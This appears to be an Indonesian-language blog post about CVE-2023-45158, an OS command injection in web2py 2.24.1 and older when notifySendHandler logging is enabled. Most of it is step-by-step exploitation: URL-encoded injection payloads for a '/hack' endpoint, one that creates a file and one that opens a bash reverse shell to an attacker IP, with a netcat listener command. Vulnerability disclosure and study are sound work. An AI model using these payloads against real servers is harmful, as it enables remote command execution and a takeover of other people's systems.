CVE-2023-45158

Kerentanan injeksi perintah OS yang ada di web2py 2.24.1 atau versi lebih lama.

Kerentanan injeksi perintah OS yang ada di web2py 2.24.1 atau versi lebih lama. Ketika produk dikonfigurasi untuk menggunakan notifySendHandler untuk pencatatan (bukan konfigurasi default), permintaan web yang dibuat dapat menjalankan perintah OS sewenang-wenang di web server menggunakan produk.

Diterbitkan: 16-10-2023
Diperbarui: 16-10-2023

web2py

Baca juga:

Langkah :

jalankan webserver
```
cd web2py
python3 web2py.py
```
Injeksi perintah menggunakan URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27
Ganti <IP-ADDRESS> dan <YOUR-COMMAND> dengan nilai-nilai Anda.

Contoh:

Buat file server http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
Reverse shell, di mesin penyerang, jalankan nc -l 127.0.0.1 8080
Buka URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Ganti <ATTACKER-IP>.

Demikian pembahasan CVE-2023-45158. Semoga bermanfaat.

fixed vulnerability JVN#80476432

No one is too busy, it's just a matter of priority.

JOEE txt

CVE-2023-45158

Alfred - Utilitas Open Source untuk OSINT

Mengembalikan Kapasitas Flasdisk yang Berkurang Tanpa Aplikasi

Pembaruan pada Nama Situs: Cara Pendekatan Baru Google

Cara menghilangkan Bulan dan Tahun di URL Postingan Blogspot

CVE-2023-45158

Gabung dalam percakapan